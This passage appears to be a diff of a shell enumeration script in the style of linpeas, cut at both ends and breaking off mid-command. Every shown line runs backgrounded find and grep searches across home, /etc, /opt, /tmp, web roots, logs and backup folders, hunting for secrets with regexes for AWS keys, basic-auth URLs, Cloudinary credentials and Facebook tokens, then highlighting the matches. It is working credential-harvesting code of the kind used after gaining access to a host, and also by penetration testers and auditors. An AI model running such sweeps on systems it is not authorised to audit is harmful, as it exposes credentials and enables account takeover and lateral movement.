"(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +wait +echo '' +print_2title "Searching APIs" +print_3title "Searching AWS Client ID (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +wait +print_3title "Searching AWS MWS Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +wait +print_3title "Searching AWS Secret Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +wait +print_3title "Searching Basic Auth Credentials (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +wait +print_3title "Searching Cloudinary Basic Auth (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +wait +print_3title "Searching Facebook Access Token (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +wait +print_3title "Searching Facebook Client ID (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE 